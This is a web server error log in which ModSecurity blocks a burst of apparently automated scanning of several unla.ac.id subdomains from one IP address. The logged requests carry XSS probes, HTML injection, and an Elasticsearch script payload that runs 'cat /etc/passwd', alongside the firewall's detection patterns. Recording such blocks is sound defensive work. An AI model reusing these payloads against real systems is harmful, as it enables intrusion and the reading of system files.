[Tue Aug 29 11:56:49.603453 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:at: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kcCo-f0AAAq5@WkAAAAK"]
[Tue Aug 29 11:56:49.650749 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16kcCo-f0AAArZP2UAAAAC"]
[Tue Aug 29 11:56:50.542818 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAq5@WwAAAAK"]
[Tue Aug 29 11:56:50.552176 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16ksCo-f0AAAqqtl0AAAAA"]
[Tue Aug 29 11:56:50.708126 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAoz8PcAAAAS"]
[Tue Aug 29 11:56:50.731381 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAAqsWDEAAAAB"]
[Tue Aug 29 11:56:51.571830 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16k8Co-f0AAAoz8PoAAAAS"]
[Tue Aug 29 11:56:51.665363 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAArB15gAAAAV"]
[Tue Aug 29 11:56:51.685476 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "pusatbahasa.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAAolK8EAAAAe"]
[Tue Aug 29 11:56:51.688681 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "informatika.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAArZP3IAAAAC"]
[Tue Aug 29 11:56:51.701646 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "ft.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAAqqtmUAAAAA"]
[Tue Aug 29 11:56:51.767961 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "journal.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAArIAbQAAAAX"]
[Tue Aug 29 11:56:52.691393 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAAoz8QEAAAAS"]
[Tue Aug 29 11:56:52.694574 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAArB154AAAAV"]
[Tue Aug 29 11:56:52.696146 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAAq-Hh4AAAAT"]
[Tue Aug 29 11:56:52.708118 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAAolK8gAAAAe"]
[Tue Aug 29 11:56:52.724480 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAArIAbkAAAAX"]
[Tue Aug 29 11:56:52.731474 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAqqtmsAAAAA"]
[Tue Aug 29 11:56:52.736893 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAArB16AAAAAV"]
[Tue Aug 29 11:56:52.771908 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAqqtm0AAAAA"]
[Tue Aug 29 11:56:52.772786 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAoz8QUAAAAS"]
[Tue Aug 29 11:56:52.782933 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "www.unla.ac.id"] [uri "/_search"] [unique_id "ZO16lMCo-f0AAAq-HiIAAAAT"]
[Tue Aug 29 11:56:52.901591 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAoz8QoAAAAS"]
[Tue Aug 29 11:56:53.852285 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lcCo-f0AAAqqtncAAAAA"]
[Tue Aug 29 11:56:53.892586 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lcCo-f0AAAqqtnkAAAAA"]
[Tue Aug 29 11:56:54.625468 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAq-HisAAAAT"]
